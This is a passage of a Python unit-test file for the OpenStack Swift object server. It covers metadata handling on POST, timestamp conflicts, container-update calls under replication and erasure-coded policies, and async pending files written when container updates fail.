mkdirs(os.path.join(self.testdir, 'sda1',
diskfile.get_tmp_dir(policy)))
def iter_policies(self):
for policy in POLICIES:
self.policy = policy
yield policy
def check_all_api_methods(self, obj_name='o', alt_res=None):
path = '/sda1/p/a/c/%s' % obj_name
body = 'SPECIAL_STRING'
op_table = {
"PUT": (body, alt_res or 201, ''), # create one
"GET": ('', alt_res or 200, body), # check it
"POST": ('', alt_res or 202, ''), # update it
"HEAD": ('', alt_res or 200, ''), # head it
"DELETE": ('', alt_res or 204, '') # delete it
}
for method in ["PUT", "GET", "POST", "HEAD", "DELETE"]:
in_body, res, out_body = op_table[method]
timestamp = normalize_timestamp(time())
req = Request.blank(
path, environ={'REQUEST_METHOD': method},
headers={'X-Timestamp': timestamp,
'Content-Type': 'application/x-test'})
req.body = in_body
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, res)
if out_body and (200 <= res < 300):
self.assertEqual(resp.body, out_body)
def test_REQUEST_SPECIAL_CHARS(self):
obj = 'special昆%20/%'
self.check_all_api_methods(obj)
def test_device_unavailable(self):
def raise_disk_unavail(*args, **kwargs):
raise DiskFileDeviceUnavailable()
self.object_controller.get_diskfile = raise_disk_unavail
self.check_all_api_methods(alt_res=507)
def test_allowed_headers(self):
dah = ['content-disposition', 'content-encoding', 'x-delete-at',
'x-object-manifest', 'x-static-large-object']
conf = {'devices': self.testdir, 'mount_check': 'false',
'allowed_headers': ','.join(['content-length'] + dah)}
self.object_controller = object_server.ObjectController(
conf, logger=debug_logger())
self.assertEqual(self.object_controller.allowed_headers, set(dah))
    def test_POST_update_meta(self):
        # Test swift.obj.server.ObjectController.POST
        #
        # End-to-end check that POST replaces user metadata and allowed
        # headers, that sysmeta written at PUT time survives POST (and
        # cannot be changed by POST), and that GET/HEAD reflect the merge.
        original_headers = self.object_controller.allowed_headers
        test_headers = 'content-encoding foo bar'.split()
        self.object_controller.allowed_headers = set(test_headers)
        # PUT the object with a mix of user meta, sysmeta and transient
        # sysmeta headers.
        put_timestamp = normalize_timestamp(time())
        headers = {'X-Timestamp': put_timestamp,
                   'Content-Type': 'application/x-test',
                   'Foo': 'fooheader',
                   'Baz': 'bazheader',
                   'X-Object-Sysmeta-Color': 'blue',
                   'X-Object-Transient-Sysmeta-Shape': 'circle',
                   'X-Object-Meta-1': 'One',
                   'X-Object-Meta-Two': 'Two'}
        req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
                            headers=headers)
        req.body = 'VERIFY'
        etag = '"%s"' % md5('VERIFY').hexdigest()
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)
        self.assertEqual(dict(resp.headers), {
            'Content-Type': 'text/html; charset=UTF-8',
            'Content-Length': str(len(resp.body)),
            'Etag': etag,
        })
        # POST new user metadata; sysmeta Color is reported back unchanged.
        post_timestamp = normalize_timestamp(time())
        headers = {'X-Timestamp': post_timestamp,
                   'X-Object-Meta-3': 'Three',
                   'X-Object-Meta-4': 'Four',
                   'Content-Encoding': 'gzip',
                   'Foo': 'fooheader',
                   'Bar': 'barheader',
                   'Content-Type': 'application/x-test'}
        req = Request.blank('/sda1/p/a/c/o',
                            environ={'REQUEST_METHOD': 'POST'},
                            headers=headers)
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 202)
        self.assertEqual(dict(resp.headers), {
            'Content-Type': 'text/html; charset=UTF-8',
            'Content-Length': str(len(resp.body)),
            'X-Object-Sysmeta-Color': 'blue',
        })
        # GET shows POSTed meta replacing the original user meta while
        # sysmeta and the data timestamps from PUT are preserved.
        req = Request.blank('/sda1/p/a/c/o')
        resp = req.get_response(self.object_controller)
        expected_headers = {
            'Content-Type': 'application/x-test',
            'Content-Length': '6',
            'Etag': etag,
            'X-Object-Sysmeta-Color': 'blue',
            'X-Object-Meta-3': 'Three',
            'X-Object-Meta-4': 'Four',
            'Foo': 'fooheader',
            'Bar': 'barheader',
            'Content-Encoding': 'gzip',
            'X-Backend-Timestamp': post_timestamp,
            'X-Timestamp': post_timestamp,
            'X-Backend-Data-Timestamp': put_timestamp,
            'X-Backend-Durable-Timestamp': put_timestamp,
            'Last-Modified': strftime(
                '%a, %d %b %Y %H:%M:%S GMT',
                gmtime(math.ceil(float(post_timestamp)))),
        }
        self.assertEqual(dict(resp.headers), expected_headers)
        # HEAD returns the same header set as GET.
        req = Request.blank('/sda1/p/a/c/o',
                            environ={'REQUEST_METHOD': 'HEAD'})
        resp = req.get_response(self.object_controller)
        self.assertEqual(dict(resp.headers), expected_headers)
        # A POST attempting to change sysmeta is accepted but the sysmeta
        # value from PUT ('blue') is retained.
        post_timestamp = normalize_timestamp(time())
        req = Request.blank('/sda1/p/a/c/o',
                            environ={'REQUEST_METHOD': 'POST'},
                            headers={'X-Timestamp': post_timestamp,
                                     'X-Object-Sysmeta-Color': 'red',
                                     'Content-Type': 'application/x-test'})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 202)
        self.assertEqual(dict(resp.headers), {
            'Content-Type': 'text/html; charset=UTF-8',
            'Content-Length': str(len(resp.body)),
            'X-Object-Sysmeta-Color': 'blue',
        })
        req = Request.blank('/sda1/p/a/c/o')
        resp = req.get_response(self.object_controller)
        self.assertEqual(dict(resp.headers), {
            'Content-Type': 'application/x-test',
            'Content-Length': '6',
            'Etag': etag,
            'X-Object-Sysmeta-Color': 'blue',
            'X-Backend-Timestamp': post_timestamp,
            'X-Timestamp': post_timestamp,
            'X-Backend-Data-Timestamp': put_timestamp,
            'X-Backend-Durable-Timestamp': put_timestamp,
            'Last-Modified': strftime(
                '%a, %d %b %Y %H:%M:%S GMT',
                gmtime(math.ceil(float(post_timestamp)))),
        })
        # test defaults
        self.object_controller.allowed_headers = original_headers
        put_timestamp = normalize_timestamp(time())
        req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
                            headers={'X-Timestamp': put_timestamp,
                                     'Content-Type': 'application/x-test',
                                     'Foo': 'fooheader',
                                     'X-Object-Sysmeta-Color': 'red',
                                     'X-Object-Meta-1': 'One',
                                     'X-Object-Manifest': 'c/bar',
                                     'Content-Encoding': 'gzip',
                                     'Content-Disposition': 'bar',
                                     'X-Static-Large-Object': 'True',
                                     })
        req.body = 'VERIFY'
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)
        self.assertEqual(dict(resp.headers), {
            'Content-Type': 'text/html; charset=UTF-8',
            'Content-Length': str(len(resp.body)),
            'Etag': etag,
        })
        req = Request.blank('/sda1/p/a/c/o')
        resp = req.get_response(self.object_controller)
        self.assertEqual(dict(resp.headers), {
            'Content-Type': 'application/x-test',
            'Content-Length': '6',
            'Etag': etag,
            'X-Object-Sysmeta-Color': 'red',
            'X-Object-Meta-1': 'One',
            'Content-Encoding': 'gzip',
            'X-Object-Manifest': 'c/bar',
            'Content-Disposition': 'bar',
            'X-Static-Large-Object': 'True',
            'X-Backend-Timestamp': put_timestamp,
            'X-Timestamp': put_timestamp,
            'X-Backend-Data-Timestamp': put_timestamp,
            'X-Backend-Durable-Timestamp': put_timestamp,
            'Last-Modified': strftime(
                '%a, %d %b %Y %H:%M:%S GMT',
                gmtime(math.ceil(float(put_timestamp)))),
        })
        # With default allowed headers, POST keeps X-Static-Large-Object
        # but drops the other non-default PUT-time headers.
        post_timestamp = normalize_timestamp(time())
        req = Request.blank('/sda1/p/a/c/o',
                            environ={'REQUEST_METHOD': 'POST'},
                            headers={'X-Timestamp': post_timestamp,
                                     'X-Object-Meta-3': 'Three',
                                     'Foo': 'fooheader',
                                     'Content-Type': 'application/x-test'})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 202)
        self.assertEqual(dict(resp.headers), {
            'Content-Type': 'text/html; charset=UTF-8',
            'Content-Length': str(len(resp.body)),
            'X-Object-Sysmeta-Color': 'red',
        })
        req = Request.blank('/sda1/p/a/c/o')
        resp = req.get_response(self.object_controller)
        self.assertEqual(dict(resp.headers), {
            'Content-Type': 'application/x-test',
            'Content-Length': '6',
            'Etag': etag,
            'X-Object-Sysmeta-Color': 'red',
            'X-Object-Meta-3': 'Three',
            'X-Static-Large-Object': 'True',
            'X-Backend-Timestamp': post_timestamp,
            'X-Timestamp': post_timestamp,
            'X-Backend-Data-Timestamp': put_timestamp,
            'X-Backend-Durable-Timestamp': put_timestamp,
            'Last-Modified': strftime(
                '%a, %d %b %Y %H:%M:%S GMT',
                gmtime(math.ceil(float(post_timestamp)))),
        })
        # Test for empty metadata
        post_timestamp = normalize_timestamp(time())
        req = Request.blank('/sda1/p/a/c/o',
                            environ={'REQUEST_METHOD': 'POST'},
                            headers={'X-Timestamp': post_timestamp,
                                     'Content-Type': 'application/x-test',
                                     'X-Object-Meta-3': ''})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 202)
        self.assertEqual(dict(resp.headers), {
            'Content-Type': 'text/html; charset=UTF-8',
            'Content-Length': str(len(resp.body)),
            'X-Object-Sysmeta-Color': 'red',
        })
        req = Request.blank('/sda1/p/a/c/o')
        resp = req.get_response(self.object_controller)
        self.assertEqual(dict(resp.headers), {
            'Content-Type': 'application/x-test',
            'Content-Length': '6',
            'Etag': etag,
            'X-Object-Sysmeta-Color': 'red',
            'X-Object-Meta-3': '',
            'X-Static-Large-Object': 'True',
            'X-Backend-Timestamp': post_timestamp,
            'X-Timestamp': post_timestamp,
            'X-Backend-Data-Timestamp': put_timestamp,
            'X-Backend-Durable-Timestamp': put_timestamp,
            'Last-Modified': strftime(
                '%a, %d %b %Y %H:%M:%S GMT',
                gmtime(math.ceil(float(post_timestamp)))),
        })
    def test_POST_old_timestamp(self):
        # A POST at or before the object's current timestamp must be
        # rejected with 409 Conflict, reporting the winning timestamp.
        ts = time()
        orig_timestamp = utils.Timestamp(ts).internal
        req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
                            headers={'X-Timestamp': orig_timestamp,
                                     'Content-Type': 'application/x-test',
                                     'X-Object-Meta-1': 'One',
                                     'X-Object-Meta-Two': 'Two'})
        req.body = 'VERIFY'
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)
        # Same timestamp should result in 409
        req = Request.blank('/sda1/p/a/c/o',
                            environ={'REQUEST_METHOD': 'POST'},
                            headers={'X-Timestamp': orig_timestamp,
                                     'X-Object-Meta-3': 'Three',
                                     'X-Object-Meta-4': 'Four',
                                     'Content-Encoding': 'gzip',
                                     'Content-Type': 'application/x-test'})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 409)
        self.assertEqual(resp.headers['X-Backend-Timestamp'], orig_timestamp)
        # Earlier timestamp should result in 409
        timestamp = normalize_timestamp(ts - 1)
        req = Request.blank('/sda1/p/a/c/o',
                            environ={'REQUEST_METHOD': 'POST'},
                            headers={'X-Timestamp': timestamp,
                                     'X-Object-Meta-5': 'Five',
                                     'X-Object-Meta-6': 'Six',
                                     'Content-Encoding': 'gzip',
                                     'Content-Type': 'application/x-test'})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 409)
        self.assertEqual(resp.headers['X-Backend-Timestamp'], orig_timestamp)
    def test_POST_conflicts_with_later_POST(self):
        # A POST older than an already-applied POST is refused with 409,
        # and no .meta file is written for the losing request.
        t_put = next(self.ts).internal
        req = Request.blank('/sda1/p/a/c/o',
                            environ={'REQUEST_METHOD': 'PUT'},
                            headers={'X-Timestamp': t_put,
                                     'Content-Length': 0,
                                     'Content-Type': 'plain/text'})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)
        t_post1 = next(self.ts).internal
        t_post2 = next(self.ts).internal
        # Apply the later POST first...
        req = Request.blank('/sda1/p/a/c/o',
                            environ={'REQUEST_METHOD': 'POST'},
                            headers={'X-Timestamp': t_post2})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 202)
        # ...then the earlier one, which must conflict.
        req = Request.blank('/sda1/p/a/c/o',
                            environ={'REQUEST_METHOD': 'POST'},
                            headers={'X-Timestamp': t_post1})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 409)
        obj_dir = os.path.join(
            self.testdir, 'sda1',
            storage_directory(diskfile.get_data_dir(0), 'p',
                              hash_path('a', 'c', 'o')))
        # Only the winning (newer) POST leaves a .meta file on disk.
        ts_file = os.path.join(obj_dir, t_post2 + '.meta')
        self.assertTrue(os.path.isfile(ts_file))
        meta_file = os.path.join(obj_dir, t_post1 + '.meta')
        self.assertFalse(os.path.isfile(meta_file))
def test_POST_not_exist(self):
timestamp = normalize_timestamp(time())
req = Request.blank('/sda1/p/a/c/fail',
environ={'REQUEST_METHOD': 'POST'},
headers={'X-Timestamp': timestamp,
'X-Object-Meta-1': 'One',
'X-Object-Meta-2': 'Two',
'Content-Type': 'text/plain'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 404)
def test_POST_invalid_path(self):
timestamp = normalize_timestamp(time())
req = Request.blank('/sda1/p/a/c', environ={'REQUEST_METHOD': 'POST'},
headers={'X-Timestamp': timestamp,
'X-Object-Meta-1': 'One',
'X-Object-Meta-2': 'Two',
'Content-Type': 'text/plain'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 400)
def test_POST_no_timestamp(self):
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'POST'},
headers={'X-Object-Meta-1': 'One',
'X-Object-Meta-2': 'Two',
'Content-Type': 'text/plain'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 400)
def test_POST_bad_timestamp(self):
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'POST'},
headers={'X-Timestamp': 'bad',
'X-Object-Meta-1': 'One',
'X-Object-Meta-2': 'Two',
'Content-Type': 'text/plain'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 400)
    def test_POST_container_connection(self):
        # Test that POST does call container_update and returns success
        # whether update to container server succeeds or fails
        def mock_http_connect(calls, response, with_exc=False):

            class FakeConn(object):
                # Minimal stand-in for a container connection: counts
                # getresponse() calls and can raise to simulate a failure.

                def __init__(self, calls, status, with_exc):
                    self.calls = calls
                    self.status = status
                    self.reason = 'Fake'
                    self.host = '1.2.3.4'
                    self.port = '1234'
                    self.with_exc = with_exc

                def getresponse(self):
                    calls[0] += 1
                    if self.with_exc:
                        raise Exception('test')
                    return self

                def read(self, amt=None):
                    return ''

            return lambda *args, **kwargs: FakeConn(calls, response, with_exc)
        ts = time()
        timestamp = normalize_timestamp(ts)
        req = Request.blank(
            '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
            headers={'X-Timestamp': timestamp,
                     'Content-Type': 'text/plain',
                     'Content-Length': '0'})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)
        # Container update succeeds (202): POST returns 202.
        req = Request.blank(
            '/sda1/p/a/c/o',
            environ={'REQUEST_METHOD': 'POST'},
            headers={'X-Timestamp': normalize_timestamp(ts + 1),
                     'X-Container-Host': '1.2.3.4:0',
                     'X-Container-Partition': '3',
                     'X-Container-Device': 'sda1',
                     'X-Container-Timestamp': '1',
                     'Content-Type': 'application/new1'})
        calls = [0]
        with mock.patch.object(object_server, 'http_connect',
                               mock_http_connect(calls, 202)):
            resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 202)
        # Container connection raises: POST still returns 202 to the client.
        req = Request.blank(
            '/sda1/p/a/c/o',
            environ={'REQUEST_METHOD': 'POST'},
            headers={'X-Timestamp': normalize_timestamp(ts + 2),
                     'X-Container-Host': '1.2.3.4:0',
                     'X-Container-Partition': '3',
                     'X-Container-Device': 'sda1',
                     'X-Container-Timestamp': '1',
                     'Content-Type': 'application/new1'})
        calls = [0]
        with mock.patch.object(object_server, 'http_connect',
                               mock_http_connect(calls, 202, with_exc=True)):
            resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 202)
        # Container server responds 500: POST still returns 202.
        req = Request.blank(
            '/sda1/p/a/c/o',
            environ={'REQUEST_METHOD': 'POST'},
            headers={'X-Timestamp': normalize_timestamp(ts + 3),
                     'X-Container-Host': '1.2.3.4:0',
                     'X-Container-Partition': '3',
                     'X-Container-Device': 'sda1',
                     'X-Container-Timestamp': '1',
                     'Content-Type': 'application/new2'})
        calls = [0]
        with mock.patch.object(object_server, 'http_connect',
                               mock_http_connect(calls, 500)):
            resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 202)
    def _test_POST_container_updates(self, policy, update_etag=None):
        # Test that POST requests result in correct calls to container_update
        #
        # Shared helper: PUT an object under `policy`, then issue a series
        # of POSTs with varying timestamps/content-types and assert which
        # ones trigger a container update and with what headers.
        t = [next(self.ts) for _ in range(0, 5)]
        calls_made = []
        update_etag = update_etag or '098f6bcd4621d373cade4e832627b4f6'

        def mock_container_update(ctlr, op, account, container, obj, request,
                                  headers_out, objdevice, policy):
            # Capture what would have been sent to the container server.
            calls_made.append((headers_out, policy))
        body = 'test'
        headers = {
            'X-Timestamp': t[1].internal,
            'Content-Type': 'application/octet-stream;swift_bytes=123456789',
            'X-Backend-Storage-Policy-Index': int(policy)}
        if policy.policy_type == EC_POLICY:
            # EC fragments will typically have a different size to the body and
            # for small bodies the fragments may be longer. For this test all
            # that matters is that the fragment and body lengths differ.
            body = body + 'ec_overhead'
            headers['X-Backend-Container-Update-Override-Etag'] = update_etag
            headers['X-Backend-Container-Update-Override-Size'] = '4'
            headers['X-Object-Sysmeta-Ec-Etag'] = update_etag
            headers['X-Object-Sysmeta-Ec-Content-Length'] = '4'
            headers['X-Object-Sysmeta-Ec-Frag-Index'] = 2
        headers['Content-Length'] = str(len(body))
        req = Request.blank('/sda1/p/a/c/o', body=body,
                            environ={'REQUEST_METHOD': 'PUT'},
                            headers=headers)
        with mock.patch('swift.obj.server.ObjectController.container_update',
                        mock_container_update):
            resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)
        self.assertEqual(1, len(calls_made))
        expected_headers = HeaderKeyDict({
            'x-size': '4',
            'x-content-type': 'application/octet-stream;swift_bytes=123456789',
            'x-timestamp': t[1].internal,
            'x-etag': update_etag})
        self.assertDictEqual(expected_headers, calls_made[0][0])
        self.assertEqual(policy, calls_made[0][1])
        # POST with no metadata newer than the data should return 409,
        # container update not expected
        calls_made = []
        req = Request.blank(
            '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'POST'},
            headers={'X-Timestamp': t[0].internal,
                     'X-Backend-Storage-Policy-Index': int(policy)})
        with mock.patch('swift.obj.server.ObjectController.container_update',
                        mock_container_update):
            resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 409)
        self.assertEqual(resp.headers['x-backend-timestamp'],
                         t[1].internal)
        self.assertEqual(0, len(calls_made))
        # POST with newer metadata returns success and container update
        # is expected
        calls_made = []
        req = Request.blank(
            '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'POST'},
            headers={'X-Timestamp': t[3].internal,
                     'X-Backend-Storage-Policy-Index': int(policy)})
        with mock.patch('swift.obj.server.ObjectController.container_update',
                        mock_container_update):
            resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 202)
        self.assertEqual(1, len(calls_made))
        expected_headers = HeaderKeyDict({
            'x-size': '4',
            'x-content-type': 'application/octet-stream;swift_bytes=123456789',
            'x-timestamp': t[1].internal,
            'x-content-type-timestamp': t[1].internal,
            'x-meta-timestamp': t[3].internal,
            'x-etag': update_etag})
        self.assertDictEqual(expected_headers, calls_made[0][0])
        self.assertEqual(policy, calls_made[0][1])
        # POST with no metadata newer than existing metadata should return
        # 409, container update not expected
        calls_made = []
        req = Request.blank(
            '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'POST'},
            headers={'X-Timestamp': t[2].internal,
                     'X-Backend-Storage-Policy-Index': int(policy)})
        with mock.patch('swift.obj.server.ObjectController.container_update',
                        mock_container_update):
            resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 409)
        self.assertEqual(resp.headers['x-backend-timestamp'],
                         t[3].internal)
        self.assertEqual(0, len(calls_made))
        # POST with newer content-type but older metadata returns success
        # and container update is expected newer content-type should have
        # existing swift_bytes appended
        calls_made = []
        req = Request.blank('/sda1/p/a/c/o',
                            environ={'REQUEST_METHOD': 'POST'},
                            headers={
                                'X-Timestamp': t[2].internal,
                                'Content-Type': 'text/plain',
                                'Content-Type-Timestamp': t[2].internal,
                                'X-Backend-Storage-Policy-Index': int(policy)
                            })
        with mock.patch('swift.obj.server.ObjectController.container_update',
                        mock_container_update):
            resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 202)
        self.assertEqual(1, len(calls_made))
        expected_headers = HeaderKeyDict({
            'x-size': '4',
            'x-content-type': 'text/plain;swift_bytes=123456789',
            'x-timestamp': t[1].internal,
            'x-content-type-timestamp': t[2].internal,
            'x-meta-timestamp': t[3].internal,
            'x-etag': update_etag})
        self.assertDictEqual(expected_headers, calls_made[0][0])
        self.assertEqual(policy, calls_made[0][1])
        # POST with older content-type but newer metadata returns success
        # and container update is expected
        calls_made = []
        req = Request.blank('/sda1/p/a/c/o',
                            environ={'REQUEST_METHOD': 'POST'},
                            headers={
                                'X-Timestamp': t[4].internal,
                                'Content-Type': 'older',
                                'Content-Type-Timestamp': t[1].internal,
                                'X-Backend-Storage-Policy-Index': int(policy)
                            })
        with mock.patch('swift.obj.server.ObjectController.container_update',
                        mock_container_update):
            resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 202)
        self.assertEqual(1, len(calls_made))
        expected_headers = HeaderKeyDict({
            'x-size': '4',
            'x-content-type': 'text/plain;swift_bytes=123456789',
            'x-timestamp': t[1].internal,
            'x-content-type-timestamp': t[2].internal,
            'x-meta-timestamp': t[4].internal,
            'x-etag': update_etag})
        self.assertDictEqual(expected_headers, calls_made[0][0])
        self.assertEqual(policy, calls_made[0][1])
        # POST with same-time content-type and metadata returns 409
        # and no container update is expected
        calls_made = []
        req = Request.blank('/sda1/p/a/c/o',
                            environ={'REQUEST_METHOD': 'POST'},
                            headers={
                                'X-Timestamp': t[4].internal,
                                'Content-Type': 'ignored',
                                'Content-Type-Timestamp': t[2].internal,
                                'X-Backend-Storage-Policy-Index': int(policy)
                            })
        with mock.patch('swift.obj.server.ObjectController.container_update',
                        mock_container_update):
            resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 409)
        self.assertEqual(0, len(calls_made))
        # POST with implicit newer content-type but older metadata
        # returns success and container update is expected,
        # update reports existing metadata timestamp
        calls_made = []
        req = Request.blank('/sda1/p/a/c/o',
                            environ={'REQUEST_METHOD': 'POST'},
                            headers={
                                'X-Timestamp': t[3].internal,
                                'Content-Type': 'text/newer',
                                'X-Backend-Storage-Policy-Index': int(policy)
                            })
        with mock.patch('swift.obj.server.ObjectController.container_update',
                        mock_container_update):
            resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 202)
        self.assertEqual(1, len(calls_made))
        expected_headers = HeaderKeyDict({
            'x-size': '4',
            'x-content-type': 'text/newer;swift_bytes=123456789',
            'x-timestamp': t[1].internal,
            'x-content-type-timestamp': t[3].internal,
            'x-meta-timestamp': t[4].internal,
            'x-etag': update_etag})
        self.assertDictEqual(expected_headers, calls_made[0][0])
        self.assertEqual(policy, calls_made[0][1])
    def test_POST_container_updates_with_replication_policy(self):
        # Run the shared POST container-update checks against the
        # replication policy (POLICIES[0]).
        self._test_POST_container_updates(POLICIES[0])

    def test_POST_container_updates_with_EC_policy(self):
        # Same checks against the EC policy; the container update should
        # carry the override etag rather than the fragment etag.
        self._test_POST_container_updates(
            POLICIES[1], update_etag='override_etag')
    def test_POST_container_updates_precedence(self):
        # Verify correct etag and size being sent with container updates for a
        # PUT and for a subsequent POST.

        def do_test(body, headers, policy):
            # PUT then POST an object using the given override headers and
            # assert both container updates carry the 'expected' etag/size.

            def mock_container_update(ctlr, op, account, container, obj, req,
                                      headers_out, objdevice, policy):
                calls_made.append((headers_out, policy))
            calls_made = []
            ts_put = next(self.ts)
            # make PUT with given headers and verify correct etag is sent in
            # container update
            headers.update({
                'Content-Type':
                    'application/octet-stream;swift_bytes=123456789',
                'X-Backend-Storage-Policy-Index': int(policy),
                'X-Object-Sysmeta-Ec-Frag-Index': 2,
                'X-Timestamp': ts_put.internal,
                'Content-Length': len(body)})
            req = Request.blank('/sda1/p/a/c/o',
                                environ={'REQUEST_METHOD': 'PUT'},
                                headers=headers, body=body)
            with mock.patch(
                    'swift.obj.server.ObjectController.container_update',
                    mock_container_update):
                resp = req.get_response(self.object_controller)
            self.assertEqual(resp.status_int, 201)
            self.assertEqual(1, len(calls_made))
            expected_headers = HeaderKeyDict({
                'x-size': '4',
                'x-content-type':
                    'application/octet-stream;swift_bytes=123456789',
                'x-timestamp': ts_put.internal,
                'x-etag': 'expected'})
            self.assertDictEqual(expected_headers, calls_made[0][0])
            self.assertEqual(policy, calls_made[0][1])
            # make a POST and verify container update has the same etag
            calls_made = []
            ts_post = next(self.ts)
            req = Request.blank(
                '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'POST'},
                headers={'X-Timestamp': ts_post.internal,
                         'X-Backend-Storage-Policy-Index': int(policy)})
            with mock.patch(
                    'swift.obj.server.ObjectController.container_update',
                    mock_container_update):
                resp = req.get_response(self.object_controller)
            self.assertEqual(resp.status_int, 202)
            self.assertEqual(1, len(calls_made))
            expected_headers.update({
                'x-content-type-timestamp': ts_put.internal,
                'x-meta-timestamp': ts_post.internal})
            self.assertDictEqual(expected_headers, calls_made[0][0])
            self.assertEqual(policy, calls_made[0][1])
        # sanity check - EC headers are ok
        headers = {
            'X-Backend-Container-Update-Override-Etag': 'expected',
            'X-Backend-Container-Update-Override-Size': '4',
            'X-Object-Sysmeta-Ec-Etag': 'expected',
            'X-Object-Sysmeta-Ec-Content-Length': '4'}
        do_test('test ec frag longer than 4', headers, POLICIES[1])
        # middleware overrides take precedence over EC/older overrides
        headers = {
            'X-Backend-Container-Update-Override-Etag': 'unexpected',
            'X-Backend-Container-Update-Override-Size': '3',
            'X-Object-Sysmeta-Ec-Etag': 'unexpected',
            'X-Object-Sysmeta-Ec-Content-Length': '3',
            'X-Object-Sysmeta-Container-Update-Override-Etag': 'expected',
            'X-Object-Sysmeta-Container-Update-Override-Size': '4'}
        do_test('test ec frag longer than 4', headers, POLICIES[1])
        # overrides with replication policy
        headers = {
            'X-Object-Sysmeta-Container-Update-Override-Etag': 'expected',
            'X-Object-Sysmeta-Container-Update-Override-Size': '4'}
        do_test('longer than 4', headers, POLICIES[0])
        # middleware overrides take precedence over EC/older overrides with
        # replication policy
        headers = {
            'X-Backend-Container-Update-Override-Etag': 'unexpected',
            'X-Backend-Container-Update-Override-Size': '3',
            'X-Object-Sysmeta-Container-Update-Override-Etag': 'expected',
            'X-Object-Sysmeta-Container-Update-Override-Size': '4'}
        do_test('longer than 4', headers, POLICIES[0])
    def _test_PUT_then_POST_async_pendings(self, policy, update_etag=None):
        # Test that PUT and POST requests result in distinct async pending
        # files when sync container update fails.
        #
        # :param policy: the storage policy under test
        # :param update_etag: container-update override etag used for EC
        #     policies; defaults to the md5 of the 4-byte body 'test'
        def fake_http_connect(*args):
            # force the synchronous container update to fail so the object
            # server spools the update to an async pending file instead
            raise Exception('test')
        device_dir = os.path.join(self.testdir, 'sda1')
        t_put = next(self.ts)
        update_etag = update_etag or '098f6bcd4621d373cade4e832627b4f6'
        put_headers = {
            'X-Trans-Id': 'put_trans_id',
            'X-Timestamp': t_put.internal,
            'Content-Type': 'application/octet-stream;swift_bytes=123456789',
            'Content-Length': '4',
            'X-Backend-Storage-Policy-Index': int(policy),
            'X-Container-Host': 'chost:cport',
            'X-Container-Partition': 'cpartition',
            'X-Container-Device': 'cdevice'}
        if policy.policy_type == EC_POLICY:
            # EC PUTs carry a frag index and report the whole-object etag
            # to the container via the override headers
            put_headers.update({
                'X-Object-Sysmeta-Ec-Frag-Index': '2',
                'X-Backend-Container-Update-Override-Etag': update_etag,
                'X-Object-Sysmeta-Ec-Etag': update_etag})
        req = Request.blank('/sda1/p/a/c/o',
                            environ={'REQUEST_METHOD': 'PUT'},
                            headers=put_headers, body='test')
        with mock.patch('swift.obj.server.http_connect', fake_http_connect), \
                mock.patch('swift.common.utils.HASH_PATH_PREFIX', ''), \
                fake_spawn():
            resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)
        # the failed container update must have been written to disk as an
        # async pending named <object-hash>-<put-timestamp>
        async_pending_file_put = os.path.join(
            device_dir, diskfile.get_async_dir(policy), 'a83',
            '06fbf0b514e5199dfc4e00f42eb5ea83-%s' % t_put.internal)
        self.assertTrue(os.path.isfile(async_pending_file_put),
                        'Expected %s to be a file but it is not.'
                        % async_pending_file_put)
        expected_put_headers = {
            'Referer': 'PUT http://localhost/sda1/p/a/c/o',
            'X-Trans-Id': 'put_trans_id',
            'X-Timestamp': t_put.internal,
            'X-Content-Type': 'application/octet-stream;swift_bytes=123456789',
            'X-Size': '4',
            'X-Etag': '098f6bcd4621d373cade4e832627b4f6',
            'User-Agent': 'object-server %s' % os.getpid(),
            'X-Backend-Storage-Policy-Index': '%d' % int(policy)}
        if policy.policy_type == EC_POLICY:
            expected_put_headers['X-Etag'] = update_etag
        self.assertDictEqual(
            pickle.load(open(async_pending_file_put)),
            {'headers': expected_put_headers,
             'account': 'a', 'container': 'c', 'obj': 'o', 'op': 'PUT'})
        # POST with newer metadata returns success and container update
        # is expected
        t_post = next(self.ts)
        post_headers = {
            'X-Trans-Id': 'post_trans_id',
            'X-Timestamp': t_post.internal,
            'Content-Type': 'application/other',
            'X-Backend-Storage-Policy-Index': int(policy),
